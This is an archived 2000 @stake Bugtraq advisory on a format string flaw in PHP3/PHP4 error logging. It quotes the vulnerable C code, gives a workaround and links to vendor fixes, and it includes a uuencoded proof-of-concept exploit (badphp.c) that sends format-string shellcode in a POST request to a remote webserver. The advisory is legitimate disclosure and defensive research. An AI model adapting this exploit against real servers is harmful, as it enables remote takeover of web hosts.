![[LWN Logo]](/images/lcorner.png) |
|
![[Timeline]](/images/Included.png) |
Date: Thu, 12 Oct 2000 10:04:32 -0400
From: "@stake Advisories" <advisories@ATSTAKE.COM>
Subject: @stake Advisory: PHP3/PHP4 Logging Format String Vulnerability (A
To: BUGTRAQ@SECURITYFOCUS.COM
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
We contacted the PHP team on 10/3/2000 concerning this problem. We wanted
to hold off releasing our advisory until a fix was available for PHP3
since some users may not be able to easily upgrade to PHP4. Fixes for
PHP3 and PHP4 are now available. We are aware that Jouko Pynnönen
<jouko@solutions.fi> found this problem independantly but chose to release
before the PHP3 fix was available.
Weld Pond
@stake, Inc.
www.atstake.com
Security Advisory
Advisory Name: PHP3/PHP4 Logging Format String Vulnerability
Release Date: 10/12/2000
Application: PHP3 and PHP4
Platform: All platforms
Severity: Attacker can remotely compromise PHP3 enabled webservers,
and most likely PHP4 enabled webservers
Author: DilDog [dildog@atstake.com]
Vendor Status: Fix for PHP3 and PHP4 available
Web: www.atstake.com/research/advisories/2000/a101200-1.txt
Executive Summary
PHP versions 3 and 4 are vulnerabled to format string attacks in
their logging functions. This can lead to remote takeover of PHP enabled
webservers that have logging enabled.
Overview
PHP versions 3 and 4 employ a set of logging functions that,
through an improper use of 'syslog()' and 'vsnprintf()', render it
vulnerable to attack. The attacker could utilize this vulnerability to
remotely compromise any PHP enabled webserver that has logging to either
syslog or to a file enabled in the 'php.ini' configuration file. This
particular attack does not affect PHP installations that do not log PHP
errors and warnings.
Detailed Description
PHP versions 3 and 4 utilize the following functions:
main/php_syslog.h:
#define php_syslog syslog
main/main.c:
void php_log_err(char *log_message)
{
...
php_syslog(LOG_NOTICE, log_message)
...
fprintf(log_file, "[%s] ", error_time_str);
fprintf(log_file, log_message);
fprintf(log_file, "\n");
...
}
Hence, if the "log_message" contains any user input at all, then
it creates a vulnerability. An exploitable condition is presented in the
following code for PHP 3, since 'php3_error' calls down to php_log_err if
logging is enabled:
main/main.c:
PHPAPI void php3_error(int type, const char *format,...) {
...
char log_buffer[1024];
snprintf(log_buffer, 1024, "PHP 3 %s: %s in %s on line %d",
error_type_str, buffer, filename, php3_get_lineno(GLOBAL(current_lineno)));
php3_log_err(log_buffer);
...
}
functions/post.c:
static char *php3_getpost(pval *http_post_vars)
{
...
php3_error(E_WARNING, "File Upload Error: No MIME boundary
found");
php3_error(E_WARNING, "There should have been a
\"boundary=3Dsomething\" in the Content-Type string");
php3_error(E_WARNING, "The Content-Type string was: \"%s\"",
ctype);
...
}
PHP4 looks vulnerable as well, but in a different place. When a
file is uploaded via a post operation, if the file name contains format
string exploit code, and the file size is larger than the maximum file
size for uploads, the following code is executed. Note that this possible
problem has not been tested by @stake, but the code path looks
problematic:
static void php_mime_split(char *buf, int cnt, char *boundary, zval
*array_ptr)
{
...
php_error(E_WARNING, "Max file size exceeded - file [%s] not
saved", namebuf);
...
}
Temporary Solution
Turn off logging on PHP3 and PHP4 by going into your 'php.ini'
file and changing the following settings to:
log_errors = Off
Vendor Response
A fixed version of PHP4 is available:
http://www.php.net/do_download.php?download_file=php-4.0.3.tar.gz
A fixed version of PHP3 is available:
http://www.php.net/distributions/php-3.0.17.tar.gz
Proof-of-Concept Code
This proof of concept code creates a zero length file in
/tmp/BADPHP. Use like this:
gcc badphp.c && ./a.out <ip address of webserver> <port of webserver>
<php file path>
(php file path must point to an existing php file, such as /foo.php3)
begin 644 badphp.c
M(VEN8VQU9&4\<W1D:6\N:#X*(VEN8VQU9&4\<WES+W1Y<&5S+F@^"B-I;F-L
M=61E/'-Y<R]S;V-K970N:#X*(VEN8VQU9&4\;F5T:6YE="]I;BYH/@HC:6YC
M;'5D93QA<G!A+VEN970N:#X*(VEN8VQU9&4\;F5T9&(N:#X*"B-D969I;F4@
M0E-)6D4@,34T.0HC9&5F:6YE($)51D9%4EI/3D4@,3(X"@II;G0@;6%I;BAI
M;G0@87)G8RP@8VAA<B`J87)G=EM=*0I["B`@:6YT(&DL<W1A<G0L8V]U;G0[
M"B`@:6YT('-T86-K;&]C/3!X0D9&1D1!-C`["B`@:6YT(',["B`@1DE,12`J
M9CL*("!F9%]S970@<F9D<SL*("!S=')U8W0@:&]S=&5N="`J:&4["B`@<W1R
M=6-T('-O8VMA9&1R7VEN('-A9&1R.PH@(&-H87(@<W!L;VET6T)325I%73L*
M("!C:&%R(&9I;&5;73TB+W1M<"]"04102%`B.PH@(&-H87(@8SL*"B`@:68H
M87)G8R$]-2D@>PH@("`@<')I;G1F*"(E<R`\861D<CX@/'!O<G0^(#QO9F9S
M970^(#QP:'`@9FEL92!N86UE/EQN(BQA<F=V6S!=*3L*("`@('!R:6YT9B@B
M;V9F<V5T/3`@9F]R(&UO<W0@<WES=&5M<RY<;B(I.R`*("`@(')E='5R;B`P
M.PH@('T*"B`@+RHJ*B!B=6EL9"!E>'!L;VET('-T<FEN9R`J*BHO"B`@"B`@
M+RH@=W)I=&4@8F%D(&9O<FUA="!S=')I;F<L(&%D9&EN9R!I;B!O9F9S970@
M*B\*("!S;G!R:6YT9BAS<&QO:70L<VEZ96]F*'-P;&]I="DL"@D@("`B0V]N
M=&5N="U4>7!E.FUU;'1I<&%R="]F;W)M+61A=&$@)24E=5@E)5@E)5@E)6AN
M(BP*"2`@(#4U.#$W("\J*V]F9G-E=#`L,2PR+#,J+R`I.PH*("`O*B!F:6QL
M('=I=&@@8G)E86MP;VEN=',@86YD(&YO<',J+PH@('-T87)T/7-T<FQE;BAS
M<&QO:70I.PH@(&UE;7-E="AS<&QO:70K<W1A<G0L,'A#0RQ"4TE:12US=&%R
M="D["B`@;65M<V5T*'-P;&]I="MS=&%R="M"549&15):3TY%*C0L,'@Y,"Q"
M549&15):3TY%*C0I.PH@('-P;&]I=%M"4TE:12TQ73TP.PH@(`H@("\J('!O
M:6YT97(@=&\@<W1A<G0@;V8@8V]D92`H<W1A8VML;V,K-"D@*B\*("!C;W5N
M=#U"549&15):3TY%.PH@(&9O<BAI/3`[:3QC;W5N=#MI*RLI('L*("`@('5N
M<VEG;F5D(&EN="!V86QU93US=&%C:VQO8RLT*RAC;W5N="HT*3L*("`@(&EF
M*"AV86QU928P>#`P,#`P,$9&*3T],"D@=F%L=65\/3!X,#`P,#`P,#0["B`@
M("!I9B@H=F%L=64F,'@P,#`P1D8P,"D]/3`I('9A;'5E?#TP>#`P,#`P-#`P
M.PH@("`@:68H*'9A;'5E)C!X,#!&1C`P,#`I/3TP*2!V86QU97P],'@P,#`T
M,#`P,#L*("`@(&EF*"AV86QU928P>$9&,#`P,#`P*3T],"D@=F%L=65\/3!X
M,#0P,#`P,#`["B`@("`J*'5N<VEG;F5D(&EN="`J*28H<W!L;VET6W-T87)T
M*VDJ-%TI/79A;'5E.PH@('T*("!S=&%R="L]0E5&1D526D].12HT*C(["@H@
M("\J*BH@8G5I;&0@<VAE;&QC;V1E("HJ*B\*"B`@<W!L;VET6W-T87)T*S!=
M/3!X.3`[("\J(&YO<"`J+PH@(`H@('-P;&]I=%MS=&%R="LQ73TP>$)!.R`O
M*B!M;W8@961X+"`H;F]T(#!X,4(V("AA*W)W*2D@*B\*("!S<&QO:71;<W1A
M<G0K,ET],'@T.3L*("!S<&QO:71;<W1A<G0K,UT],'A&13L*("!S<&QO:71;
M<W1A<G0K-%T],'A&1CL*("!S<&QO:71;<W1A<G0K-5T],'A&1CL*"B`@<W!L
M;VET6W-T87)T*S9=/3!X1C<[("\J(&YO="!E9'@@*B\*("!S<&QO:71;<W1A
M<G0K-UT],'A$,CL*"B`@<W!L;VET6W-T87)T*SA=/3!X0CD[("\J(&UO=B!E
M8W@L("AN;W0@,'@T,"`H3U]#4D5!5"DI("HO"B`@<W!L;VET6W-T87)T*SE=
M/3!X0D8["B`@<W!L;VET6W-T87)T*S$P73TP>$9&.PH@('-P;&]I=%MS=&%R
M="LQ,5T],'A&1CL*("!S<&QO:71;<W1A<G0K,3)=/3!X1D8["B`@"B`@<W!L
M;VET6W-T87)T*S$S73TP>$8W.R`O*B!N;W0@96-X("HO"B`@<W!L;VET6W-T
M87)T*S$T73TP>$0Q.PH@(`H@('-P;&]I=%MS=&%R="LQ-5T],'A%.#L@+RH@
M8V%L;"!E:7`K-"`K(&EN8R!E87@@*&]V97)L87!P:6YG*2`J+PH@('-P;&]I
M=%MS=&%R="LQ-ET],'A&1CL@"B`@<W!L;VET6W-T87)T*S$W73TP>$9&.R`*
M("!S<&QO:71;<W1A<G0K,3A=/3!X1D8[(`H@('-P;&]I=%MS=&%R="LQ.5T]
M,'A&1CL@"B`@<W!L;VET6W-T87)T*S(P73TP>$,P.PH@('-P;&]I=%MS=&%R
M="LR,5T],'@U0CL@+RH@<&]P(&5B>"`J+PH@('-P;&]I=%MS=&%R="LR,ET]
M,'@V03L@+RH@<'5S:"`R,B`H;V9F<V5T('1O(&5N9"!O9B!S<&QO:70@*&9I
M;&5N86UE*2D@*B\*("!S<&QO:71;<W1A<G0K,C-=/3!X,38["B`@<W!L;VET
M6W-T87)T*S(T73TP>#4X.R`O*B!P;W`@96%X("HO"B`@<W!L;VET6W-T87)T
M*S(U73TP>#`S.R`O*B!A9&0@96)X+&5A>"`J+PH@('-P;&]I=%MS=&%R="LR
M-ET],'A$.#L*("`*("!S<&QO:71;<W1A<G0K,C==/3!X,S,[("\J('AO<B!E
M87@L96%X("HO"B`@<W!L;VET6W-T87)T*S(X73TP>$,P.PH*("!S<&QO:71;
M<W1A<G0K,CE=/3!X.#@[("\J(&UO=B!B>71E('!T<B!;96)X*S$Q72QA;"`J
M+PH@('-P;&]I=%MS=&%R="LS,%T],'@T,SL*("!S<&QO:71;<W1A<G0K,S%=
M/3!X,$(["B`*("!S<&QO:71;<W1A<G0K,S)=/3!X.#,[("\J(&%D9"!E87@L
M-2`J+PH@('-P;&]I=%MS=&%R="LS,UT],'A#,#L*("!S<&QO:71;<W1A<G0K
M,S1=/3!X,#4["@H@('-P;&]I=%MS=&%R="LS-5T],'A#1#L@+RH@:6YT(#@P
M("AO<&5N*2`J+PH@('-P;&]I=%MS=&%R="LS-ET],'@X,#L*"B`@<W!L;VET
M6W-T87)T*S,W73TP>#,S.R`O*B!X;W(@96%X+&5A>"`J+PH@('-P;&]I=%MS
M=&%R="LS.%T],'A#,#L*(`H@('-P;&]I=%MS=&%R="LS.5T],'@T,#L@+RH@
M:6YC(&5A>"`J+PH@(`H@('-P;&]I=%MS=&%R="LT,%T],'A#1#L@+RH@:6YT
M(#@P("A?97AI="D@*B\*("!S<&QO:71;<W1A<G0K-#%=/3!X.#`["B`@"B`@
M+RH@861D(&9I;&5N86UE('1O('1O=6-H("HO"B`@<W1R;F-P>2@F<W!L;VET
M6W-T87)T*S0R72QF:6QE+'-T<FQE;BAF:6QE*2D["@H@("\J*BH@<V5N9"!E
M>'!L;VET('-T<FEN9R`J*BHO"B`*("`O*B!C<F5A=&4@<V]C:V5T("HO"B`@
M<SUS;V-K970H4$9?24Y%5"Q33T-+7U-44D5!32Q)4%!23U1/7U1#4"D["B`@
M:68H<SPP*2!["B`@("!P<FEN=&8H(F-O=6QD;B=T(&-R96%T92!S;V-K970N
M7&XB*3L*("`@(')E='5R;B`P.PH@('T@"B`*("`O*B!C;VYN96-T('1O('!O
M<G0@*B\*("!M96US970H)G-A9&1R+#`L<VEZ96]F*'-A9&1R*2D["B`@<V%D
M9'(N<VEN7V9A;6EL>3U!1E])3D54.PH@('-A9&1R+G-I;E]P;W)T/6AT;VYS
M*&%T;VDH87)G=ELR72DI.PH@(&AE/6=E=&AO<W1B>6YA;64H87)G=ELQ72D[
M"B`@:68H:&4]/4Y53$PI('L*("`@('!R:6YT9B@B:6YV86QI9"!H;W-T;F%M
M92Y<;B(I.PH@('T*("!M96UC<'DH)BAS861D<BYS:6Y?861D<BYS7V%D9'(I
M+&AE+3YH7V%D9')?;&ES=%LP72QS:7IE;V8H<W1R=6-T(&EN7V%D9'(I*3L*
M"B`@:68H8V]N;F5C="AS+"AS=')U8W0@<V]C:V%D9'(@*BDF<V%D9'(L<VEZ
M96]F*'-A9&1R*2DA/3`I('L*("`@('!R:6YT9B@B8V]U;&1N)W0@8V]N;F5C
M="Y<;B(I.PH@("`@<F5T=7)N(#`["B`@?0H@(`H@("\J(&9D;W!E;B!T:&4@
M<V]C:V5T('1O('5S92!S=')E86T@9G5N8W1I;VYS("HO"B`@9CUF9&]P96XH
M<RPB=R(I.PH@(&EF*&8]/4Y53$PI('L*("`@(&-L;W-E*',I.PH@("`@<')I
M;G1F*")C;W5L9&XG="!F9&]P96X@<V]C:V5T+EQN(BD["B`@("!R971U<FX@
M,#L*("!]"@H@("\J('!U="!T:&4@<&]S="!R97%U97-T('1O('1H92!S;V-K
M970@*B\*("!F<')I;G1F*&8L(E!/4U0@)7,@2%144"\Q+C!<;B(L87)G=ELT
M72D["B`@9G!U=',H<W!L;VET+&8I.PH@(&9P=71C*"=<;B<L9BD["B`@9G!U
M=&,H)UQN)RQF*3L*("!F9FQU<V@H9BD["@H@("\J(&-L;W-E('1H92!S;V-K
M970@*B\*("!F8VQO<V4H9BD["B`@8VQO<V4H<RD["@H@(')E='5R;B`P.PI]
("@H*"@H*"@H`
`
end
For more advisories: http://www.atstake.com/research/advisories/
PGP Key: http://www.atstake.com/research/pgp_key.asc
Copyright 2000 @stake, Inc. All rights reserved.
-----BEGIN PGP SIGNATURE-----
Version: PGP 7.0
iQA/AwUBOeXDs1ESXwDtLdMhEQKhfQCg9vH3t5G8VsJfm87jcfFd1+wUwSUAoPK0
Nuo1xrPafrB4/ktOyIvMJzzf
=URKs
-----END PGP SIGNATURE-----